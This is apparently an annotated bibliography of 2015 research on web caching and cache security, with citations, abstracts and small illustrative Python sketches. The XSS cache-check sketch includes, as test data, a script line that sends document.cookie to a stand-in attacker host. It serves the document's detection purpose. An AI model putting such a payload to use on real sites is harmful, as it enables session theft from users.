Web Caching 2015
Web caches offer a potential for mischief. As the need for caching capacity grows with cloud and mobile communications, so does the need for more and better security. The articles cited here address cache security issues including geo-inference attacks, scriptless timing attacks, and a proposed incognito tab. Research on caching more generally is also cited. These articles appeared in 2015.
Panja, B.; Gennarelli, T.; Meharia, P., “Handling Cross Site Scripting Attacks Using Cache Check to Reduce Webpage Rendering Time with Elimination of Sanitization and Filtering in Light Weight Mobile Web Browser,” in Mobile and Secure Services (MOBISECSERV), 2015 First Conference on, vol., no., pp. 1–7, 20–21 Feb. 2015. doi:10.1109/MOBISECSERV.2015.7072878
Abstract: In this paper we propose a new approach to prevent and detect potential cross-site scripting attacks. Our method, called Buffer Based Cache Check, utilizes both the server side and the client side to detect and prevent XSS attacks, and requires modification of both in order to function correctly. With Cache Check, instead of the server supplying a complete whitelist of all the known trusted scripts to the mobile browser every time a page is requested, the server stores a cache that contains a validated “trusted” instance from the last time the page was rendered, which can be checked against the requested page for inconsistencies. We believe that with our proposed method, rendering times in mobile browsers will be significantly reduced, as part of the checking is done on the server and less checking is done within the mobile browser, which is slower than the server. With our method the entire checking process isn’t dumped onto the mobile browser, so the browser should be able to render pages faster: it only checks for “untrusted” content, whereas with other approaches every single line of code is checked by the mobile browser, which increases rendering times.
Keywords: cache storage; client-server systems; mobile computing; online front-ends; security of data; trusted computing; Web page rendering time; XSS attacks; buffer based cache check; client-side; cross-site scripting attacks; filtering; light weight mobile Web browser; sanitization; server-side; trusted instance; untrusted content; Browsers; Filtering; Mobile communication; Radio access networks; Rendering (computer graphics); Security; Servers; Cross site scripting; cache check; mobile browser; webpage rendering (ID#: 15-7179)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7072878&isnumber=7072857
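The paper does not publish an implementation; the core of the Cache Check idea, comparing the scripts on a requested page against a cached "trusted" instance rather than a full whitelist, can be sketched as a set difference over script fingerprints (the function names and the SHA-256 fingerprinting are assumptions, not the authors' code):

```python
import hashlib

def script_fingerprints(scripts):
    """Hash each script so the server-side trusted snapshot stays compact."""
    return {hashlib.sha256(s.encode()).hexdigest() for s in scripts}

def find_untrusted(trusted_scripts, requested_scripts):
    """Return scripts on the requested page that are absent from the trusted snapshot."""
    trusted = script_fingerprints(trusted_scripts)
    return [s for s in requested_scripts
            if hashlib.sha256(s.encode()).hexdigest() not in trusted]

# Snapshot from the last time the page rendered cleanly (kept server-side).
trusted_page = ["renderMenu();", "loadAds();"]
# The requested page carries an extra, injected script.
requested_page = trusted_page + ["location='//evil.example/?c='+document.cookie"]
suspicious = find_untrusted(trusted_page, requested_page)
```

The mobile browser then only needs to inspect the scripts in `suspicious`, rather than re-checking every line of the page.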
Basile, C.; Lioy, A., “Analysis of Application-Layer Filtering Policies with Application to HTTP,” in Networking, IEEE/ACM Transactions on, vol. 23, no.1, pp. 28–41, Feb. 2015. doi:10.1109/TNET.2013.2293625
Abstract: Application firewalls are increasingly used to inspect upper-layer protocols (as HTTP) that are the target or vehicle of several attacks and are not properly addressed by network firewalls. Like other security controls, application firewalls need to be carefully configured, as errors have a significant impact on service security and availability. However, currently no technique is available to analyze their configuration for correctness and consistency. This paper extends a previous model for analysis of packet filters to the policy anomaly analysis in application firewalls. Both rule-pair and multirule anomalies are detected, hence reducing the likelihood of conflicting and suboptimal configurations. The expressiveness of this model has been successfully tested against the features of Squid, a popular Web caching proxy offering various access control capabilities. The tool implementing this model has been tested on various scenarios and exhibits good performance.
Keywords: Internet; authorisation; firewalls; transport protocols; HTTP; Squid Web caching proxy; access control capabilities; application firewalls; application-layer filtering policies; multirule anomalies; packet filters; policy anomaly analysis; rule-pair anomalies; service security; upper-layer protocols; Access control; Analytical models; IEEE transactions; IP networks; Logic gates; Protocols; Application gateway; firewall; policy anomalies; policy conflicts; proxy; regular expressions (ID#: 15-7180)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6690252&isnumber=7041254
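The paper's anomaly model covers Squid's full access-control language; a toy version of its rule-pair analysis (the rule format and prefix-only matching are simplifying assumptions) shows what a shadowing anomaly is: an earlier rule matches a superset of a later rule's traffic with the opposite action, so the later rule can never fire.

```python
def matched_subset(rule_low, rule_high):
    """True if every request matched by rule_low is also matched by rule_high
    (with URL-prefix rules, that is simple prefix containment)."""
    return rule_low["prefix"].startswith(rule_high["prefix"])

def find_shadowing(rules):
    """Report pairs (i, j) where earlier rule i shadows later rule j."""
    anomalies = []
    for i in range(len(rules)):
        for j in range(i + 1, len(rules)):
            if matched_subset(rules[j], rules[i]) and rules[i]["action"] != rules[j]["action"]:
                anomalies.append((i, j))
    return anomalies

rules = [
    {"prefix": "/intranet/", "action": "deny"},
    {"prefix": "/intranet/public/", "action": "allow"},  # unreachable: shadowed by rule 0
]
```

Swapping the two rules (most specific first) removes the anomaly, which is the kind of reordering such analysis suggests.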
Gerbet, Thomas; Kumar, Amrit; Lauradoux, Cedric, “The Power of Evil Choices in Bloom Filters,” in Dependable Systems and Networks (DSN), 2015 45th Annual IEEE/IFIP International Conference on, vol., no., pp. 101–112, 22–25 June 2015. doi:10.1109/DSN.2015.21
Abstract: A Bloom filter is a probabilistic hash-based data structure extensively used in software, including online security applications. This paper raises the following important question: Are Bloom filters correctly designed in a security context? The answer is no, and the reasons are multiple: bad choices of parameters, lack of adversary models and misused hash functions. Indeed, developers truncate cryptographic digests without a second thought about the security implications. This work constructs adversary models for Bloom filters and illustrates attacks on three applications, namely the SCRAPY web spider, the BITLY DABLOOMS spam filter and the SQUID cache proxy. As a general impact, filters are forced to systematically exhibit worst-case behavior; one reason is that Bloom filter parameters are always computed for the average case. We compute the worst-case parameters in adversarial settings, show how to securely and efficiently use cryptographic hash functions, and propose several other countermeasures to mitigate our attacks.
Keywords: Complexity theory; Cryptography; Data structures; Electronic mail; Indexes; Software; Bloom filters; Denial-of-Service; Digest truncation; Hash functions; Pre-image attack (ID#: 15-7181)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7266842&isnumber=7266818
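The average-case sizing the paper critiques is the textbook formula m = −n·ln p/(ln 2)² with k = (m/n)·ln 2 hash functions; a minimal filter built on full-length SHA-256 digests (the class layout is an illustrative assumption, not the paper's code) makes the contrast with the truncated digests the authors attack concrete:

```python
import hashlib
import math

class BloomFilter:
    def __init__(self, n, p):
        # Average-case sizing: m = -n ln(p) / (ln 2)^2, k = (m/n) ln 2.
        # The paper shows these guarantees collapse against an adversary.
        self.m = math.ceil(-n * math.log(p) / math.log(2) ** 2)
        self.k = max(1, round(self.m / n * math.log(2)))
        self.bits = bytearray(self.m)

    def _indexes(self, key):
        # Derive k indexes from full-length SHA-256 digests (no truncation).
        for i in range(self.k):
            h = hashlib.sha256(f"{i}:{key}".encode()).digest()
            yield int.from_bytes(h[:8], "big") % self.m

    def add(self, key):
        for idx in self._indexes(key):
            self.bits[idx] = 1

    def __contains__(self, key):
        return all(self.bits[idx] for idx in self._indexes(key))
```

An adversary who can see a truncated digest can search offline for keys whose bits are already set, forcing the false-positive rate far above the designed p; full-length digests with a secret salt are one of the countermeasures in the paper's direction.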
Yaoqi Jia; Xinshu Dong; Zhenkai Liang; Saxena, P., “I Know Where You’ve Been: Geo-Inference Attacks via the Browser Cache,” in Internet Computing, IEEE, vol. 19, no.1, pp. 44–53, Jan–Feb. 2015. doi:10.1109/MIC.2014.103
Abstract: To provide more relevant content and better responsiveness, many websites customize their services according to users’ geolocations. However, if geo-oriented websites leave location-sensitive content in the browser cache, other sites can sniff that content via side channels. The authors’ case studies demonstrate the reliability and power of geo-inference attacks, which can measure the timing of browser cache queries and track a victim’s country, city, and neighborhood. Existing defenses cannot effectively prevent such attacks, and additional support is required for a better defense deployment.
Keywords: Web sites; cache storage; geography; online front-ends; browser cache; geo-inference attacks; geo-oriented Websites; side channels; Browsers; Cache memory; Content management; Geography; Google; Internet; Mobile radio management; Privacy; Web browsers; Web technologies; security and privacy protection (ID#: 15-7182)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6879050&isnumber=7031813
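The attack needs no read access to the cache, only a clock: a cached resource loads much faster than one fetched over the network. A simulated sketch (the URLs, latency numbers, and threshold are invented for illustration):

```python
import time

CACHE_HIT_MS, NETWORK_MS = 2, 120          # assumed latencies for the simulation

browser_cache = {"https://maps.example.de/tile.png"}   # victim visited a German geo-site

def load(url):
    """Simulate a resource load: cache hits return far faster than network fetches."""
    time.sleep((CACHE_HIT_MS if url in browser_cache else NETWORK_MS) / 1000)

def probe(url, threshold_ms=30):
    """An attacker page cannot read the cache, but it can time the load."""
    start = time.perf_counter()
    load(url)
    elapsed_ms = (time.perf_counter() - start) * 1000
    return elapsed_ms < threshold_ms       # fast load -> cached -> site was visited

visited_germany = probe("https://maps.example.de/tile.png")
visited_japan = probe("https://maps.example.jp/tile.png")
```

In a real attack the probe runs from JavaScript against location-specific resources such as map tiles or localized logos, which is how the authors narrow a victim down to country, city, and neighborhood.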
Qiao, Xiuquan; Chen, Jun-Liang; Tan, Wei; Dustdar, Schahram, “Service Provisioning in Content-Centric Networking: Challenges, Opportunities, and Promising Directions,” in Internet Computing, IEEE, vol., no. 99, pp. 1–1. doi:10.1109/MIC.2015.116
Abstract: With the evolution of Internet applications, the contemporary IP-based Internet architecture increasingly finds itself incapable of meeting the demands of current network usage patterns. Content-Centric Networking (CCN), a clean-slate future network architecture, differs from existing IP networks and has salient features such as in-network caching, name-based routing, friendly mobility, and built-in security. This new architecture has a profound impact on how Internet applications are provisioned. Here, from the perspective of upper-layer applications, we discuss four challenges and three opportunities regarding service provisioning in CCN. We describe an approach called the Service Innovation Environment for Future Internet (SIEFI) that addresses the challenges while exploiting the opportunities for the future of CCN.
Keywords: Computer architecture; IP networks; Routing; Technological innovation; Web servers (ID#: 15-7183)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7239513&isnumber=5226613
Lee, R.B., “Rethinking Computers for Cybersecurity,” in Computer, vol. 48, no.4, pp.16–25, Apr. 2015. doi:10.1109/MC.2015.118
Abstract: Cyberattacks are growing at an alarming rate, even as our dependence on cyberspace transactions increases. Our software security solutions may no longer be sufficient. It is time to rethink computer design from the foundations. Can hardware security be enlisted to improve cybersecurity? The author discusses two classes of hardware security: hardware-enhanced security architectures for improving software and system security, and secure hardware. The Web extra at https://youtu.be/z-c9ACviGNo is a video of a 2006 invited seminar at the Naval Postgraduate School, in which author Ruby B. Lee presents the Secret-Protected (SP) architecture, which is a minimalist set of hardware features that can be added to any microprocessor or embedded processor that protects the “master secrets” that in turn protect other keys and encrypted information, programs and data.
Keywords: security of data; computer design; cybersecurity; cyberspace transactions; hardware security; hardware-enhanced security architectures; software security improvement; system security improvement; Access control; Computer architecture; Computer crime; Computer security; Cryptography; Cloud; SaaS; computer architecture; cryptography; data access control; hackers; secure caches; security; self-protecting data; trusted software (ID#: 15-7184)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7085648&isnumber=7085638
Aghaei-Foroushani, V.; Zincir-Heywood, A.N., “A Proxy Identifier Based on Patterns in Traffic Flows,” in High Assurance Systems Engineering (HASE), 2015 IEEE 16th International Symposium on, vol., no., pp. 118–125, 8–10 Jan. 2015. doi:10.1109/HASE.2015.26
Abstract: Proxies are commonly used on today’s Internet. On one hand, end users can choose proxies to hide their identities for privacy reasons; on the other hand, ubiquitous systems can use them to intercept traffic for purposes such as caching. In addition, attackers can use such technologies to anonymize their malicious behaviours and hide their identities. Identification of such behaviours is important for defense applications, since it can facilitate the assessment of security threats. The objective of this paper is to identify proxy traffic as seen in a traffic log file without any access to the proxy server or the clients behind it. To achieve this: (i) we employ a mixture of log files to represent real-life proxy behavior, and (ii) we design and develop a data-driven, machine-learning-based approach to provide recommendations for the automatic identification of such behaviours. Our results show that we are able to achieve our objective with promising performance even though the problem is very challenging.
Keywords: Internet; data privacy; pattern recognition; telecommunication traffic; ubiquitous computing; Internet; log files; malicious behaviours; patterns; privacy reasons; proxy identifier; real-life proxy behavior; security threats; traffic flows; ubiquitous systems; Cryptography; Delays; IP networks; Probes; Web servers; Behavior Analysis; Network Security; Proxy; Traffic Flow (ID#: 15-7185)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7027422&isnumber=7027398
Gillman, D.; Yin Lin; Maggs, B.; Sitaraman, R.K., “Protecting Websites from Attack with Secure Delivery Networks,” in Computer, vol. 48, no.4, pp. 26–34, Apr. 2015. doi:10.1109/MC.2015.116
Abstract: Secure delivery networks can help prevent or mitigate the most common attacks against mission-critical websites. A case study from a leading provider of content delivery services illustrates one such network’s operation and effectiveness. The Web extra at https://youtu.be/4FRRI0aJLQM is an overview of the evolving threat landscape with Akamai Director of Web Security Solutions Product Marketing, Dan Shugrue. Dan also shares how Akamai’s Kona Site Defender service handles the increasing frequency, volume and sophistication of Web attacks with a unique architecture that is always on and doesn’t degrade performance.
Keywords: Web sites; security of data; Web attacks; Website protection; content delivery services; mission-critical Websites; secure delivery networks; Computer crime; Computer security; Firewalls (computing); IP networks; Internet; Protocols; Akamai Technologies; DDoS attacks; DNS; Domain Name System; Internet/Web technologies; Operation Ababil; SQL injection; WAF; Web Application Firewall; XSS; cache busting; cross-site scripting; cybercrime; distributed denial-of-service attacks; distributed systems; floods; hackers; security (ID#: 15-7186)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7085639&isnumber=7085638
Jin, Yong; Fujikawa, Kenji; Harai, Hiroaki; Ohta, Masataka, “Secure Glue: A Cache and Zone Transfer Considering Automatic Renumbering,” in Computer Software and Applications Conference (COMPSAC), 2015 IEEE 39th Annual, vol.2, no., pp. 393–398, 1-5 July 2015. doi:10.1109/COMPSAC.2015.38
Abstract: The Domain Name System (DNS) is the most widely used name resolution system for computers and services on the Internet. The number of domain name registrations is reaching 276 million across all top level domains (TLDs) today, and the DNS query count is increasing year over year. The main reason for the high DNS query count is the increase of out-of-bailiwick domain name delegation, since such a delegation (an NS without a glue A record) makes the client send extra DNS queries for the glue A record. On the other hand, the master/slave model is not compatible with address renumbering in DNS, since the master is indicated by its IP address in the slave. Thus it is necessary to redesign the current DNS protocol, considering lower name resolution latency as well as enhanced automatic convergence after address renumbering, for an effective and sustained name resolution service. In this paper, we propose two mechanisms: one is the secure glue A cache and update, which reduces name resolution latency by cutting the DNS query count with low security risk; the other is the automatic zone transfer, which automatically recovers the DNS based on FQDN (Fully Qualified Domain Name) after address renumbering. We successfully implemented the prototype in Linux as an extension of BIND (Berkeley Internet Name Domain). The evaluation results confirmed an approximately 25% reduction in the DNS query count and successful automatic DNS recovery after address renumbering.
Keywords: IP networks; Protocols; Prototypes; Semiconductor optical amplifiers; Servers; Web and internet services; Automatic address renumbering; DNS; Glue A; Out-of-bailiwick; Zone transfer (ID#: 15-7187)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7273645&isnumber=7273573
Nakano, Yuusuke; Kamiyama, Noriaki; Shiomoto, Kohei; Hasegawa, Go; Murata, Masayuki; Miyahara, Hideo, “Web Performance Acceleration by Caching Rendering Results,” in Network Operations and Management Symposium (APNOMS), 2015 17th Asia-Pacific, vol., no., pp. 244–249, 19–21 Aug. 2015. doi:10.1109/APNOMS.2015.7275434
Abstract: Web performance, the time from clicking a link on a web page to finishing displaying the linked page, is becoming increasingly important, and low web performance tends to result in the loss of customers. In our research, we measured the time for downloading files on popular web pages by running web browsers on four hosts worldwide using PlanetLab, and found the longest portion of download time to be Blocked time, the waiting time before downloading starts in web browsers. In this paper, we propose a method for accelerating web performance by reducing such Blocked time with a cache of rendering results. The proposed method uses an in-network rendering function which renders web pages instead of web browsers; this function also stores the rendering results in its cache and reuses them for other web browsers to reduce the Blocked time. To evaluate the proposed method, we calculated the web performance of web pages whose rendering results are cached, by analyzing the measured download time of actual web pages. We found that the proposed method accelerates web performance for long round trip time (RTT) web pages or long RTT clients if the web pages’ dynamic file percentages are within 80%.
Keywords: Acceleration; Browsers; Rendering (computer graphics);Time measurement; Web pages; Web servers (ID#: 15-7188)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7275434&isnumber=7275336
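The in-network rendering function amounts to memoizing rendering results across browsers; a toy model (all latency figures and names are invented for illustration) shows why the second client's Blocked time collapses:

```python
render_cache = {}   # shared, in-network cache of rendering results

def render(url):
    """Simulated server-side fetch + render; returns (result, cost in ms)."""
    return f"<rendered {url}>", 300 + 150   # assumed fetch and render latencies

def serve(url):
    """Reuse a cached rendering when one exists, instead of re-rendering."""
    if url in render_cache:
        return render_cache[url], 20        # assumed cache-lookup latency
    result, cost = render(url)
    render_cache[url] = result
    return result, cost

first = serve("https://example.com/")   # cold: one browser pays fetch + render
second = serve("https://example.com/")  # warm: another browser reuses the result
```

The paper's caveat about dynamic file percentages corresponds to the fraction of a page that cannot be reused this way.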
Chuanfei Xu; Bo Tang; Man Lung Yiu, “Diversified Caching for Replicated Web Search Engines,” in Data Engineering (ICDE), 2015 IEEE 31st International Conference on, vol., no., pp. 207–218, 13–17 April 2015. doi:10.1109/ICDE.2015.7113285
Abstract: Commercial web search engines adopt parallel and replicated architecture in order to support high query throughput. In this paper, we investigate the effect of caching on the throughput in such a setting. A simple scheme, called uniform caching, would replicate the cache content to all servers. Unfortunately, it does not exploit the variations among queries, thus wasting memory space on caching the same cache content redundantly on multiple servers. To tackle this limitation, we propose a diversified caching problem, which aims to diversify the types of queries served by different servers, and maximize the sharing of terms among queries assigned to the same server. We show that it is NP-hard to find the optimal diversified caching scheme, and identify intuitive properties to seek good solutions. Then we present a framework with a suite of techniques and heuristics for diversified caching. Finally, we evaluate the proposed solution with competitors by using a real dataset and a real query log.
Keywords: cache storage; query processing; search engines; NP-hard; optimal diversified caching scheme; parallel architecture; real query log; replicated Web search engines; replicated architecture; Computer architecture; Indexes; Search engines; Servers; Silicon; Throughput; Training (ID#: 15-7189)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7113285&isnumber=7113253
Bangar, P.; Singh, K.N., “Investigation and Performance Improvement of Web Cache Recommender System,” in Futuristic Trends on Computational Analysis and Knowledge Management (ABLAZE), 2015 International Conference on, vol., no., pp. 585–589, 25–27 Feb. 2015. doi:10.1109/ABLAZE.2015.7154930
Abstract: Numerous large- and small-scale applications are now developed to fulfill users’ needs, and in recent years Web based applications have grown rapidly. As a result, network performance is affected and the browsing experience becomes slow. Performance improvement of traditional browsing and prefetching techniques is therefore required, so that application speed is optimized and high performance Web pages are delivered. In this paper, pre-fetching techniques are investigated, and a recommendation system is developed for cache replacement. To design the recommendation engine, a promising data model is found in [6]. The given system utilizes the proxy access log for data analysis; the main advantage of the proxy access log is that it contains the entire Web page navigation history of a targeted user. This data model offers high performance outcomes, but its computational complexity is not easily manageable. Thus the traditional data model is modified using a new scheme, where the K-means algorithm is applied for user data personalization. The ID3 algorithm is then used to learn user navigation patterns, and KNN and probability theory are utilized to predict upcoming Web URLs for pre-fetching. The proposed data model is implemented using the Visual Studio framework, and the performance of the system is evaluated and compared in terms of memory used, time consumption, accuracy, and error rate. According to the obtained results, the proposed predictive system offers high performance as compared to the traditional data model.
Keywords: cache storage; data models; learning (artificial intelligence); probability; recommender systems; ID3 algorithm; K-mean algorithm; KNN; Web URL prediction; Web based applications; Web cache recommender system; Web pages; accuracy analysis; browsing experience; browsing technique; cache replacement; computational complexity; data analysis; data model; error rate; memory consumption; network performance; performance evaluation; performance improvement; predictive system; prefetching technique; probability theory; proxy access log; recommendation engine design; time consumption; user data personalization; user navigation pattern learning; visual studio framework; Accuracy; Algorithm design and analysis; Data mining; Data models; Error analysis; Memory management; Prediction algorithms; ID3; K-means; caching; pre-fetching (ID#: 15-7191)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7154930&isnumber=7154914
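The paper's full pipeline (K-means personalization, ID3, KNN) is involved; as a simplified stand-in, the prefetching decision it feeds can be illustrated with a first-order successor model mined from a proxy access log (the log contents and function names here are hypothetical):

```python
from collections import Counter, defaultdict

def successor_counts(sessions):
    """Tally which URL tends to follow which in the proxy access log."""
    counts = defaultdict(Counter)
    for session in sessions:
        for current, following in zip(session, session[1:]):
            counts[current][following] += 1
    return counts

def predict_next(counts, current):
    """Prefetch candidate: the most frequent successor of the current URL."""
    if current not in counts:
        return None
    return counts[current].most_common(1)[0][0]

log = [["/home", "/news", "/sports"],
       ["/home", "/news", "/weather"],
       ["/home", "/mail"]]
model = successor_counts(log)
```

A cache would prefetch `predict_next(model, current_url)` while the current page renders; the paper's KNN-plus-probability predictor plays this role with per-user personalization.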
Johnson, T.A.; Seeling, P., “Browsing the Mobile Web: Device, Small Cell, and Distributed Mobile Caches,” in Communication Workshop (ICCW), 2015 IEEE International Conference on, vol., no., pp.1025–1029, 8–12 June 2015. doi:10.1109/ICCW.2015.7247311
Abstract: The increasing amounts of data requested by mobile client devices have given rise to broad research endeavors to determine how network providers can cope with this challenge. Based on real world data used to derive upper limits of web page complexity, we provide an evaluation of web browsing and localized caching approaches. In this paper, we employ two different user-browsing models for (i) individual mobile clients, (ii) mobile clients sharing one centralized small cell cache, and (iii) mobile clients operating in an energy-optimized co-located fashion. We find that for a given content popularity distribution, average group savings due to caching depend highly on the user model. Furthermore, we find that for the purpose of overall savings determinations, an aggregated virtual cache falls within less than ten percent of a more elaborate energy-conscious approach to caching.
Keywords: Internet; cellular radio; mobile computing; Web page complexity; aggregated virtual cache; centralized small cell cache; content popularity distribution; distributed mobile caches; energy-conscious approach; energy-optimized colocated fashion; group savings; localized caching approaches; mobile Web; mobile client devices; mobile clients sharing; network providers; real world data; user-browsing models; Conferences; Data models; Joints; Mobile communication; Mobile computing; Mobile handsets; Web pages; Cooperative communications; Green mobile communications; Mobile communications; Mobile cooperative applications (ID#: 15-7192)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7247311&isnumber=7247062
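A back-of-the-envelope simulation (the popularity model and all parameters are assumptions, not the paper's data) reproduces the qualitative finding that pooling a cell's requests into one shared cache raises the hit rate over per-device caches:

```python
import random

def simulate(requests_per_client, clients, shared):
    """Hit rate with per-device caches versus one cache shared by the small cell."""
    rng = random.Random(1)                              # same request sequence for both runs
    catalog = list(range(50))
    weights = [1 / (rank + 1) for rank in range(50)]    # Zipf-like content popularity
    caches = [set()] if shared else [set() for _ in range(clients)]
    hits = total = 0
    for c in range(clients):
        cache = caches[0] if shared else caches[c]
        for _ in range(requests_per_client):
            item = rng.choices(catalog, weights=weights)[0]
            total += 1
            if item in cache:
                hits += 1
            else:
                cache.add(item)
    return hits / total

solo = simulate(200, 3, shared=False)
pooled = simulate(200, 3, shared=True)
```

With a shared cache, later clients benefit from items already fetched by their neighbors, which is the savings mechanism the small-cell and aggregated-virtual-cache models capture.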
Matsushita, Kazuki; Nishimine, Masashi; Ueda, Kazunori, “Cooperative Cache Distribution System for Virtual P2P Web Proxy,” in Computer Software and Applications Conference (COMPSAC), 2015 IEEE 39th Annual , vol.3, no., pp. 646–647, 1–5 July 2015. doi:10.1109/COMPSAC.2015.147
Abstract: In recent years, data transfer via the WWW has become one of the most popular applications, and web traffic consumes a large share of network resources on the Internet. We have previously proposed a peer-to-peer cache distribution system to reduce the consumption of network resources. Systems based on our proposal enable peers to receive part of the data from other peers while downloading data from a server. In this paper, we report further extensions for implementation in the web browser as plug-in software.
Keywords: Computers; Conferences; Multimedia communication; Peer-to-peer computing; Protocols; Servers; Software (ID#: 15-7193)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7273447&isnumber=7273299
Khandekar, A.A.; Mane, S.B., “Analyzing Different Cache Replacement Policies on Cloud,” in Industrial Instrumentation and Control (ICIC), 2015 International Conference on, vol., no., pp. 709–712, 28–30 May 2015. doi:10.1109/IIC.2015.7150834
Abstract: Today, caching is considered the key technology that bridges the performance gap between memory hierarchies through spatial or temporal locality; in disk storage systems in particular, it has a prominent effect. In operating systems, databases, and the World Wide Web, caching is considered one of the major steps in system design for achieving higher performance. In cloud systems, heavy I/O activity is associated with different applications, and performance degrades as a result; if caching is implemented, these applications would benefit the most. Various cache replacement policies have been proposed and implemented to enhance system performance, and these algorithms define the enhancement factor and play a major role in the efficiency of the system. Different caching policies have different effects on system performance; however, traditional cache replacement algorithms are not easily applicable to web applications. As the demand for web services increases, there is a need to reduce download time and Internet traffic. To avoid cache saturation and make caching effective, an informed decision has to be made as to which documents to evict from the cache. This paper compares different cache replacement policies in traditional systems as well as in web applications, and proposes a system which implements the LRU and CERA caching algorithms and gives its performance evaluation.
Keywords: Web services; cache storage; cloud computing; operating systems (computers); storage management; telecommunication traffic; I/O; Internet traffic; Web services; World Wide Web; cache replacement policies; cloud; databases; disk storage system; memory hierarchies; operating systems; spatial localities; temporal localities; Algorithm design and analysis; Cloud computing; Computers; Performance evaluation; Servers; System performance (ID#: 15-7194)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7150834&isnumber=7150576
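Of the policies compared, LRU is the usual baseline; a compact sketch using Python's OrderedDict (a standard textbook construction, not the paper's implementation):

```python
from collections import OrderedDict

class LRUCache:
    """Least-Recently-Used replacement: evict the entry untouched the longest."""

    def __init__(self, capacity):
        self.capacity = capacity
        self.entries = OrderedDict()

    def get(self, key):
        if key not in self.entries:
            return None
        self.entries.move_to_end(key)         # a hit makes the entry most-recent
        return self.entries[key]

    def put(self, key, value):
        if key in self.entries:
            self.entries.move_to_end(key)
        self.entries[key] = value
        if len(self.entries) > self.capacity:
            self.entries.popitem(last=False)  # evict the least-recently-used entry
```

The paper's point is that web workloads (varying document sizes, fetch costs, and freshness) often call for policies beyond pure recency, hence its comparison with alternatives such as CERA.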
Ahmed, S.T.; Loguinov, D., “Modeling Randomized Data Streams in Caching, Data Processing, and Crawling Applications,” in Computer Communications (INFOCOM), 2015 IEEE Conference on, vol., no., pp. 1625–1633, April 26 2015–May 1 2015. doi:10.1109/INFOCOM.2015.7218542
Abstract: Many BigData applications (e.g., MapReduce, web caching, search in large graphs) process streams of random key-value records that follow highly skewed frequency distributions. In this work, we first develop stochastic models for the probability to encounter unique keys during exploration of such streams and their growth rate over time. We then apply these models to the analysis of LRU caching, MapReduce overhead, and various crawl properties (e.g., node-degree bias, frontier size) in random graphs.
Keywords: Big Data; cache storage; information retrieval; parallel processing; stochastic processes; Big Data applications; LRU caching; MapReduce overhead; caching application; crawl properties; crawling application; data processing; frequency distribution; probability; random graphs; randomized data streams; stochastic model; Analytical models; Computational modeling; Computers; Conferences; Random variables; Stochastic processes; Yttrium (ID#: 15-7195)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7218542&isnumber=7218353
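The skewed streams the paper models can be reproduced with a Zipf-like generator; counting distinct keys at checkpoints gives the unique-key growth curve that the stochastic models describe (all parameters here are illustrative):

```python
import random

def zipf_stream(num_keys, length, alpha=1.0, seed=7):
    """Draw a key stream whose frequencies follow a Zipf law (weight ~ rank^-alpha)."""
    rng = random.Random(seed)
    weights = [1 / (rank ** alpha) for rank in range(1, num_keys + 1)]
    return rng.choices(range(num_keys), weights=weights, k=length)

def unique_growth(stream, checkpoints):
    """Count distinct keys seen by each checkpoint: the quantity the paper models."""
    seen, growth = set(), []
    for t, key in enumerate(stream, start=1):
        seen.add(key)
        if t in checkpoints:
            growth.append(len(seen))
    return growth

growth = unique_growth(zipf_stream(10_000, 50_000), {1_000, 10_000, 50_000})
```

Heavy skew means the curve rises quickly and then flattens, which is exactly what makes LRU caching effective and what determines frontier size in crawling.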
Ahammad, P.; Gaunker, R.; Kennedy, B.; Reshadi, M.; Kumar, K.; Pathan, A.K.; Kolam, H., “A Flexible Platform for QoE-Driven Delivery of Image-Rich Web Applications,” in Multimedia and Expo (ICME), 2015 IEEE International Conference on, vol., no., pp. 1–6, June 29 2015–July 3 2015. doi:10.1109/ICME.2015.7177516
Abstract: The advent of content-rich modern web applications, unreliable network connectivity and device heterogeneity demands flexible web content delivery platforms that can handle the high variability along many dimensions — especially for the mobile web. Images account for more than 60% of the content delivered by present-day webpages and have a strong influence on the perceived webpage latency and end-user experience. We present a flexible web delivery platform with a client-cloud architecture and content-aware optimizations to address the problem of delivering image-rich web applications. Our solution makes use of quantitative measures of image perceptual quality, machine learning algorithms, partial caching and opportunistic client-side choices to efficiently deliver images on the web. Using data from the WWW, we experimentally demonstrate that our approach shows significant improvement on various web performance criteria that are critical for maintaining a desirable end-user quality-of-experience (QoE) for image-rich web applications.
Keywords: Internet; cloud computing; image processing; learning (artificial intelligence); mobile computing; quality of experience; QoE-driven delivery; Web performance criteria; client-cloud architecture; content-aware optimizations; content-rich modern Web applications; end-user experience; end-user quality-of-experience; flexible Web content delivery platforms; image perceptual quality; image-rich Web applications; machine learning algorithms; mobile Web; opportunistic client-side choices; partial caching; perceived Web page latency; Browsers; Image coding; Mobile communication; Optimization; Servers; Streaming media; Transcoding; Content-aware performance optimization; Multimedia web applications; Quality of Experience; Web delivery service (ID#: 15-7196)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7177516&isnumber=7177375
Herrero Agustin, J.L., “Model-Driven Web Applications,” in Science and Information Conference (SAI), 2015, vol., no., pp. 954–964, 28–30 July 2015. doi:10.1109/SAI.2015.7237258
